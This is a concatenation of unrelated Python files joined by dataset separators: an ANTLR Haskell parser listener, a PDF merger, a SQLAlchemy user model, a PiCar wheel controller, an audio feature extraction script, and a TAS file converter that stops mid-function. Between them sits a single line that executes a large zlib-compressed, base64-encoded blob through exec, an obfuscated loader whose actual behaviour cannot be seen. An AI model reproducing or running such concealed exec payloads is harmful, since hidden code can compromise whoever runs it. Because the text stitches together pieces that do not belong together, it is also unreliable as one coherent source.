# Exit a parse tree produced by HaskellParser#conop.
def exitConop(self, ctx:HaskellParser.ConopContext):
pass
# Enter a parse tree produced by HaskellParser#qconop.
def enterQconop(self, ctx:HaskellParser.QconopContext):
pass
# Exit a parse tree produced by HaskellParser#qconop.
def exitQconop(self, ctx:HaskellParser.QconopContext):
pass
# Enter a parse tree produced by HaskellParser#gconsym.
def enterGconsym(self, ctx:HaskellParser.GconsymContext):
pass
# Exit a parse tree produced by HaskellParser#gconsym.
def exitGconsym(self, ctx:HaskellParser.GconsymContext):
pass
# Enter a parse tree produced by HaskellParser#gtycon.
def enterGtycon(self, ctx:HaskellParser.GtyconContext):
pass
# Exit a parse tree produced by HaskellParser#gtycon.
def exitGtycon(self, ctx:HaskellParser.GtyconContext):
pass
# Enter a parse tree produced by HaskellParser#ntgtycon.
def enterNtgtycon(self, ctx:HaskellParser.NtgtyconContext):
pass
# Exit a parse tree produced by HaskellParser#ntgtycon.
def exitNtgtycon(self, ctx:HaskellParser.NtgtyconContext):
pass
# Enter a parse tree produced by HaskellParser#oqtycon.
def enterOqtycon(self, ctx:HaskellParser.OqtyconContext):
pass
# Exit a parse tree produced by HaskellParser#oqtycon.
def exitOqtycon(self, ctx:HaskellParser.OqtyconContext):
pass
# Enter a parse tree produced by HaskellParser#qtyconop.
def enterQtyconop(self, ctx:HaskellParser.QtyconopContext):
pass
# Exit a parse tree produced by HaskellParser#qtyconop.
def exitQtyconop(self, ctx:HaskellParser.QtyconopContext):
pass
# Enter a parse tree produced by HaskellParser#qtycon.
def enterQtycon(self, ctx:HaskellParser.QtyconContext):
pass
# Exit a parse tree produced by HaskellParser#qtycon.
def exitQtycon(self, ctx:HaskellParser.QtyconContext):
pass
# Enter a parse tree produced by HaskellParser#tycon.
def enterTycon(self, ctx:HaskellParser.TyconContext):
pass
# Exit a parse tree produced by HaskellParser#tycon.
def exitTycon(self, ctx:HaskellParser.TyconContext):
pass
# Enter a parse tree produced by HaskellParser#qtyconsym.
def enterQtyconsym(self, ctx:HaskellParser.QtyconsymContext):
pass
# Exit a parse tree produced by HaskellParser#qtyconsym.
def exitQtyconsym(self, ctx:HaskellParser.QtyconsymContext):
pass
# Enter a parse tree produced by HaskellParser#tyconsym.
def enterTyconsym(self, ctx:HaskellParser.TyconsymContext):
pass
# Exit a parse tree produced by HaskellParser#tyconsym.
def exitTyconsym(self, ctx:HaskellParser.TyconsymContext):
pass
# Enter a parse tree produced by HaskellParser#op.
def enterOp(self, ctx:HaskellParser.OpContext):
pass
# Exit a parse tree produced by HaskellParser#op.
def exitOp(self, ctx:HaskellParser.OpContext):
pass
# Enter a parse tree produced by HaskellParser#varop.
def enterVarop(self, ctx:HaskellParser.VaropContext):
pass
# Exit a parse tree produced by HaskellParser#varop.
def exitVarop(self, ctx:HaskellParser.VaropContext):
pass
# Enter a parse tree produced by HaskellParser#qop.
def enterQop(self, ctx:HaskellParser.QopContext):
pass
# Exit a parse tree produced by HaskellParser#qop.
def exitQop(self, ctx:HaskellParser.QopContext):
pass
# Enter a parse tree produced by HaskellParser#qopm.
def enterQopm(self, ctx:HaskellParser.QopmContext):
pass
# Exit a parse tree produced by HaskellParser#qopm.
def exitQopm(self, ctx:HaskellParser.QopmContext):
pass
# Enter a parse tree produced by HaskellParser#hole_op.
def enterHole_op(self, ctx:HaskellParser.Hole_opContext):
pass
# Exit a parse tree produced by HaskellParser#hole_op.
def exitHole_op(self, ctx:HaskellParser.Hole_opContext):
pass
# Enter a parse tree produced by HaskellParser#qvarop.
def enterQvarop(self, ctx:HaskellParser.QvaropContext):
pass
# Exit a parse tree produced by HaskellParser#qvarop.
def exitQvarop(self, ctx:HaskellParser.QvaropContext):
pass
# Enter a parse tree produced by HaskellParser#qvaropm.
def enterQvaropm(self, ctx:HaskellParser.QvaropmContext):
pass
# Exit a parse tree produced by HaskellParser#qvaropm.
def exitQvaropm(self, ctx:HaskellParser.QvaropmContext):
pass
# Enter a parse tree produced by HaskellParser#tyvar.
def enterTyvar(self, ctx:HaskellParser.TyvarContext):
pass
# Exit a parse tree produced by HaskellParser#tyvar.
def exitTyvar(self, ctx:HaskellParser.TyvarContext):
pass
# Enter a parse tree produced by HaskellParser#tyvarop.
def enterTyvarop(self, ctx:HaskellParser.TyvaropContext):
pass
# Exit a parse tree produced by HaskellParser#tyvarop.
def exitTyvarop(self, ctx:HaskellParser.TyvaropContext):
pass
# Enter a parse tree produced by HaskellParser#tyvarid.
def enterTyvarid(self, ctx:HaskellParser.TyvaridContext):
pass
# Exit a parse tree produced by HaskellParser#tyvarid.
def exitTyvarid(self, ctx:HaskellParser.TyvaridContext):
pass
# Enter a parse tree produced by HaskellParser#tycls.
def enterTycls(self, ctx:HaskellParser.TyclsContext):
pass
# Exit a parse tree produced by HaskellParser#tycls.
def exitTycls(self, ctx:HaskellParser.TyclsContext):
pass
# Enter a parse tree produced by HaskellParser#qtycls.
def enterQtycls(self, ctx:HaskellParser.QtyclsContext):
pass
# Exit a parse tree produced by HaskellParser#qtycls.
def exitQtycls(self, ctx:HaskellParser.QtyclsContext):
pass
# Enter a parse tree produced by HaskellParser#var.
def enterVar(self, ctx:HaskellParser.VarContext):
pass
# Exit a parse tree produced by HaskellParser#var.
def exitVar(self, ctx:HaskellParser.VarContext):
pass
# Enter a parse tree produced by HaskellParser#qvar.
def enterQvar(self, ctx:HaskellParser.QvarContext):
pass
# Exit a parse tree produced by HaskellParser#qvar.
def exitQvar(self, ctx:HaskellParser.QvarContext):
pass
# Enter a parse tree produced by HaskellParser#qvarid.
def enterQvarid(self, ctx:HaskellParser.QvaridContext):
pass
# Exit a parse tree produced by HaskellParser#qvarid.
def exitQvarid(self, ctx:HaskellParser.QvaridContext):
pass
# Enter a parse tree produced by HaskellParser#varid.
def enterVarid(self, ctx:HaskellParser.VaridContext):
pass
# Exit a parse tree produced by HaskellParser#varid.
def exitVarid(self, ctx:HaskellParser.VaridContext):
pass
# Enter a parse tree produced by HaskellParser#qvarsym.
def enterQvarsym(self, ctx:HaskellParser.QvarsymContext):
pass
# Exit a parse tree produced by HaskellParser#qvarsym.
def exitQvarsym(self, ctx:HaskellParser.QvarsymContext):
pass
# Enter a parse tree produced by HaskellParser#qvarsym_no_minus.
def enterQvarsym_no_minus(self, ctx:HaskellParser.Qvarsym_no_minusContext):
pass
# Exit a parse tree produced by HaskellParser#qvarsym_no_minus.
def exitQvarsym_no_minus(self, ctx:HaskellParser.Qvarsym_no_minusContext):
pass
# Enter a parse tree produced by HaskellParser#varsym.
def enterVarsym(self, ctx:HaskellParser.VarsymContext):
pass
# Exit a parse tree produced by HaskellParser#varsym.
def exitVarsym(self, ctx:HaskellParser.VarsymContext):
pass
# Enter a parse tree produced by HaskellParser#varsym_no_minus.
def enterVarsym_no_minus(self, ctx:HaskellParser.Varsym_no_minusContext):
pass
# Exit a parse tree produced by HaskellParser#varsym_no_minus.
def exitVarsym_no_minus(self, ctx:HaskellParser.Varsym_no_minusContext):
pass
# Enter a parse tree produced by HaskellParser#special_id.
def enterSpecial_id(self, ctx:HaskellParser.Special_idContext):
pass
# Exit a parse tree produced by HaskellParser#special_id.
def exitSpecial_id(self, ctx:HaskellParser.Special_idContext):
pass
# Enter a parse tree produced by HaskellParser#qconid.
def enterQconid(self, ctx:HaskellParser.QconidContext):
pass
# Exit a parse tree produced by HaskellParser#qconid.
def exitQconid(self, ctx:HaskellParser.QconidContext):
pass
# Enter a parse tree produced by HaskellParser#conid.
def enterConid(self, ctx:HaskellParser.ConidContext):
pass
# Exit a parse tree produced by HaskellParser#conid.
def exitConid(self, ctx:HaskellParser.ConidContext):
pass
# Enter a parse tree produced by HaskellParser#qconsym.
def enterQconsym(self, ctx:HaskellParser.QconsymContext):
pass
# Exit a parse tree produced by HaskellParser#qconsym.
def exitQconsym(self, ctx:HaskellParser.QconsymContext):
pass
# Enter a parse tree produced by HaskellParser#consym.
def enterConsym(self, ctx:HaskellParser.ConsymContext):
pass
# Exit a parse tree produced by HaskellParser#consym.
def exitConsym(self, ctx:HaskellParser.ConsymContext):
pass
# Enter a parse tree produced by HaskellParser#literal.
def enterLiteral(self, ctx:HaskellParser.LiteralContext):
pass
# Exit a parse tree produced by HaskellParser#literal.
def exitLiteral(self, ctx:HaskellParser.LiteralContext):
pass
# Enter a parse tree produced by HaskellParser#opn.
def enterOpn(self, ctx:HaskellParser.OpnContext):
pass
# Exit a parse tree produced by HaskellParser#opn.
def exitOpn(self, ctx:HaskellParser.OpnContext):
pass
# Enter a parse tree produced by HaskellParser#close.
def enterClose(self, ctx:HaskellParser.CloseContext):
pass
# Exit a parse tree produced by HaskellParser#close.
def exitClose(self, ctx:HaskellParser.CloseContext):
pass
# Enter a parse tree produced by HaskellParser#semi.
def enterSemi(self, ctx:HaskellParser.SemiContext):
pass
# Exit a parse tree produced by HaskellParser#semi.
def exitSemi(self, ctx:HaskellParser.SemiContext):
pass
# Enter a parse tree produced by HaskellParser#modid.
def enterModid(self, ctx:HaskellParser.ModidContext):
pass
# Exit a parse tree produced by HaskellParser#modid.
def exitModid(self, ctx:HaskellParser.ModidContext):
pass
# Enter a parse tree produced by HaskellParser#commas.
def enterCommas(self, ctx:HaskellParser.CommasContext):
pass
# Exit a parse tree produced by HaskellParser#commas.
def exitCommas(self, ctx:HaskellParser.CommasContext):
pass
# Enter a parse tree produced by HaskellParser#bars.
def enterBars(self, ctx:HaskellParser.BarsContext):
pass
# Exit a parse tree produced by HaskellParser#bars.
def exitBars(self, ctx:HaskellParser.BarsContext):
pass
# Enter a parse tree produced by HaskellParser#special.
def enterSpecial(self, ctx:HaskellParser.SpecialContext):
pass
# Exit a parse tree produced by HaskellParser#special.
def exitSpecial(self, ctx:HaskellParser.SpecialContext):
pass
# Enter a parse tree produced by HaskellParser#symbol.
def enterSymbol(self, ctx:HaskellParser.SymbolContext):
pass
# Exit a parse tree produced by HaskellParser#symbol.
def exitSymbol(self, ctx:HaskellParser.SymbolContext):
pass
# Enter a parse tree produced by HaskellParser#ascSymbol.
def enterAscSymbol(self, ctx:HaskellParser.AscSymbolContext):
pass
# Exit a parse tree produced by HaskellParser#ascSymbol.
def exitAscSymbol(self, ctx:HaskellParser.AscSymbolContext):
pass
# Enter a parse tree produced by HaskellParser#integer.
def enterInteger(self, ctx:HaskellParser.IntegerContext):
pass
# Exit a parse tree produced by HaskellParser#integer.
def exitInteger(self, ctx:HaskellParser.IntegerContext):
pass
# Enter a parse tree produced by HaskellParser#pfloat.
def enterPfloat(self, ctx:HaskellParser.PfloatContext):
pass
# Exit a parse tree produced by HaskellParser#pfloat.
def exitPfloat(self, ctx:HaskellParser.PfloatContext):
pass
# Enter a parse tree produced by HaskellParser#pchar.
def enterPchar(self, ctx:HaskellParser.PcharContext):
pass
# Exit a parse tree produced by HaskellParser#pchar.
def exitPchar(self, ctx:HaskellParser.PcharContext):
pass
# Enter a parse tree produced by HaskellParser#pstring.
def enterPstring(self, ctx:HaskellParser.PstringContext):
pass
# Exit a parse tree produced by HaskellParser#pstring.
def exitPstring(self, ctx:HaskellParser.PstringContext):
pass
del HaskellParser
|
nilq/baby-python
|
python
|
"""
Author-Aastha Singh
pythonscript to merge all pdf files in one single pdf present in the current working directory
"""
import os
from PyPDF2 import PdfFileMerger #pip install PyPDF2
#listing out all the pdf in the current working directory using OS library
pdfs = [file for file in os.listdir() if file.endswith(".pdf")]
merger = PdfFileMerger()
#merging all the pdf
for pdf in pdfs:
merger.append(open(pdf, 'rb'))
with open("merged-result.pdf", "wb") as merge:
merger.write(merge)
|
nilq/baby-python
|
python
|
from pydantic.types import UUID4
from sqlalchemy.orm.session import Session, object_session
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, Index
from sqlalchemy.sql.sqltypes import Boolean, String
from sqlalchemy_utils.types import TSVectorType
from wattle.core.const import SCHEMA, CoreErrorType
from wattle.core.exceptions import CoreError
from wattle.core.models.db.common import Base, DateTimeMixin, IdentifierMixin
from wattle.core.models.py.user import (
BasicUserCreateModel,
UserCreateModel,
UserUpdateModel,
)
from wattle.core.utils.auth import get_password_hash
class User(Base, IdentifierMixin, DateTimeMixin):
__tablename__ = "user"
__table_args__ = (
Index(
"idx_search_plain_trgm",
"search_plain",
postgresql_ops={"search_plain": "gin_trgm_ops"},
postgresql_using="gin",
),
{
"schema": SCHEMA,
},
)
email = Column(String, unique=True, nullable=True)
hashed_password = Column(String, nullable=False)
verified = Column(
Boolean, default=False, server_default=expression.false(), nullable=False
)
first_name = Column(String, nullable=False)
last_name = Column(String, nullable=False)
search_plain = Column(String, nullable=True)
search_vector = Column(TSVectorType("first_name", "last_name"))
@classmethod
def get_by_id(cls, session: Session, id_: UUID4) -> "User":
return session.query(cls).get(id_)
@classmethod
def get_by_email(cls, session: Session, email: str) -> "User":
return session.query(cls).filter(cls.email == email).first()
@classmethod
def create(cls, session: Session, data: UserCreateModel) -> "User":
userWithEmail = cls.get_by_email(session, data.email)
if userWithEmail:
raise CoreError(CoreErrorType.EMAIL_CONFLICT)
user = cls(
**data.dict(exclude={"password", "confirm_password"}),
hashed_password=get_password_hash(data.password),
verified=False,
)
session.add(user)
session.commit()
session.refresh(user)
return user
@classmethod
def create_basic(cls, session: Session, data: BasicUserCreateModel) -> "User":
if data.email:
userWithEmail = cls.get_by_email(session, data.email)
if userWithEmail:
raise CoreError(CoreErrorType.EMAIL_CONFLICT)
user = cls(
**data.dict(),
hashed_password="basic-user",
verified=False,
)
session.add(user)
session.commit()
session.refresh(user)
return user
def verify(self):
self.verified = True
object_session(self).commit()
def change_password(self, new_password: str):
self.hashed_password = get_password_hash(new_password)
object_session(self).commit()
def update(self, data: UserUpdateModel):
self.first_name = data.first_name
self.last_name = data.last_name
object_session(self).commit()
|
nilq/baby-python
|
python
|
import servoHouse
from picar import back_wheels
import picar
def init():
picar.setup()
global bw
bw = back_wheels.Back_Wheels()
picar.setup()
servoHouse.init()
def forward(speed):
bw.speed = speed
bw.backward()
def backward(speed):
bw.speed = speed
bw.forward()
def stop():
bw.stop()
def steer(ang):
servoHouse.setSteer(ang)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#!/usr/bin/python
#
# Author Yann Bayle
# E-mail bayle.yann@live.fr
# License MIT
# Created 12/04/2017
# Updated 12/04/2017
# Version 1.0.0
#
"""
Description of harmony-analyser-parser.py
======================
:Example:
python harmony-analyser-parser.py
"""
import os
import re
import sys
import utils
import shutil
import argparse
def extract_features(in_dir, out_dir, path, verbose=False):
in_dir = utils.abs_path_dir(in_dir)
path = utils.abs_path_dir(path)
cur_dir = os.getcwd()
os.chdir(in_dir)
script = "harmony-analyser-script-jar-with-dependencies.jar"
src = path + script
dst = in_dir + script
shutil.copy(src, dst)
options = [
"nnls-chroma:nnls-chroma",
"nnls-chroma:chordino-tones",
"nnls-chroma:chordino-labels",
"qm-vamp-plugins:qm-keydetector",
"chord_analyser:tps_distance"
# "chord_analyser:chord_complexity_distance",
# "chroma_analyser:complexity_difference",
# "chord_analyser:average_chord_complexity_distance"
]
for opt in options:
cmd = "java -jar " + script + " -a " + opt + " -s .wav -t 0.07"
utils.run_cmd(cmd, verbose)
os.remove(dst)
cp_cmd = "cp *.txt " + out_dir
utils.run_cmd(cp_cmd)
# utils.run_cmd("rm *.txt")
os.chdir(cur_dir)
def main(args):
"""
@brief Main entry point
"""
path = utils.abs_path_dir(args.path)
in_dir = utils.abs_path_dir(args.in_dir)
out_dir = utils.abs_path_dir(args.out_dir)
id_songs_feat_done = []
for filen in os.listdir(out_dir):
if os.path.isfile(out_dir + filen):
m = re.search(r"\d{3,9}", filen)
id_songs_feat_done.append(m.group())
id_songs_feat_done = list(set(id_songs_feat_done))
index = 0
with open("../data/filelist.csv", "r") as filep:
for line in filep:
row = line[:-1].split(",")
# Check if features have been extracted by YAAFE, Marsyas & Essentia
if "1" in row[6] and "1" in row[7] and "1" in row[8]:
if not row[0] in id_songs_feat_done:
folder = in_dir + row[1] + "_" + row[2] + "_" + row[0]
index += 1
print(str(index) + " " + folder)
extract_features(folder, out_dir, path)
if __name__ == "__main__":
PARSER = argparse.ArgumentParser(
description="Parser for harmony-analyser")
PARSER.add_argument(
"-i",
"--in_dir",
help="The intput directory containing wave files",
type=str,
default="/media/sf_SharedFolder/DataSets/Recisio/audio/",
metavar="in_dir")
PARSER.add_argument(
"-o",
"--out_dir",
help="The output directory for storing features",
type=str,
default="/media/sf_DATA/ISMIR2017/features/origins/chromas/",
metavar="out_dir")
PARSER.add_argument(
"-p",
"--path",
help="The path for the harmony-analyser script",
type=str,
default="/home/yann/Documents/harmony-analyser/harmony-analyser/target/",
metavar="path")
main(PARSER.parse_args())
|
nilq/baby-python
|
python
|
import zlib,base64
exec(zlib.decompress(base64.b64decode("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")))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# This script converts .tas files from EagleIsland TAS tool
# (https://github.com/rjr5838/EagleIslandTAS/) to libTAS input file.
# Just run ./EagleIsland2libTAS path/to/tasfile.tas
import glob
import math
import os
import re
import sys
def main():
EagleIsland2libTAS().convert()
def get_line(label_or_line_number, file):
try:
return int(label_or_line_number)
except ValueError:
current_line = 0
for line in file:
current_line += 1
if line == f'#{label_or_line_number}\n':
return current_line
return float('inf')
class EagleIsland2libTAS:
def __init__(self):
self.input_file = None
self.output_file = None
self.regex_input = re.compile(r'[\s]*([\d]*)((?:,(?:[RLUDJKXCGSQNFO]|[\d.]*))*)')
self.regex_comment = re.compile(r'[\s]*(#|[\s]*$)')
self.frame_counter = 0
def convert(self):
self.input_file = open(sys.argv[1], 'r')
self.output_file = open(f'{os.path.splitext(sys.argv[1])[0]}.ltm', 'w')
# Perform the actual conversion
self.export_file(self.input_file)
self.output_file.close()
def get_read_data(self, line: str):
index = line.find(',')
if index > 0:
file_path = line[0:index]
else:
file_path = line[0:-1]
file_path = f'{os.path.dirname(sys.argv[1])}/{file_path}'
# Check if full filename was used, get file if it wasn't
if not os.path.exists(file_path):
files = [f for f in glob.glob(f'{file_path}*.tas')]
if not files:
return None, None, None
file_path = str(files[0])
file = open(file_path, 'r')
skip_lines = 0
line_len = float('inf')
# Check how many line numbers were given and convert any labels to lines
if index > 0:
index_len = line.find(',', index + 1)
if index_len > 0:
start_line = line[index + 1: index_len]
end_line = line[index_len + 1:-1]
skip_lines = get_line(start_line, file)
line_len = skip_lines + get_line(end_line, file)
else:
start_line = line[index + 1:-1]
skip_lines = get_line(start_line, file)
if skip_lines is None:
skip_lines = 0
print(f"Reading {line[0:-1]} from {skip_lines} to {line_len}, at frame {self.frame_counter}")
return file, skip_lines, line_len
def export_file(self, file, start_line=0, end_line=float('inf')):
file.seek(0)
cur_line = 0
skip_line = False
for line in file:
cur_line += 1
line_lower = line.lower()
if cur_line <= start_line:
continue
if cur_line > end_line:
break
if skip_line:
skip_line = False
continue
if self.regex_comment.match(line):
continue
if line_lower.startswith('read'):
read_path, start, end = self.get_read_data(line[5:])
if read_path is not None:
self.export_file(read_path, start, end)
continue
if line_lower.startswith('add'):
line = line[3:]
if line_lower.startswith('skip'):
skip_line = True
continue
match = self.regex_input.match(line)
if match:
output_keys = ''
button_order = 'ABXYbgs()[]udlr'
button_mapping = 'JXCK..S...GUDLR'
output_buttons = ['.'] * 15
output_axes = '0:0'
is_axis = False
for single_input in match.group(2).split(',')[1:]:
if is_axis:
angle = 0 if single_input == '' else float(single_input)
# Compute coordinates of the left analog stick to match the
# requested angle. Use the max amplitude to get precise values.
# We must also compensate for the deadzone which is 0.239532471f
rad_angle = math.radians(angle)
deadzone = 0.239532471
float_x = math.copysign(math.fabs(math.sin(rad_angle)) * (1 - deadzone) + deadzone, math.sin(rad_angle))
float_y = math.copysign(math.fabs(math.cos(rad_angle)) * (1 - deadzone) + deadzone, math.cos(rad_angle))
x = 32767 * float_x
y = -32767 * float_y
output_axes = f'{str(int(x))}:{str(int(y))}'
is_axis = False
continue
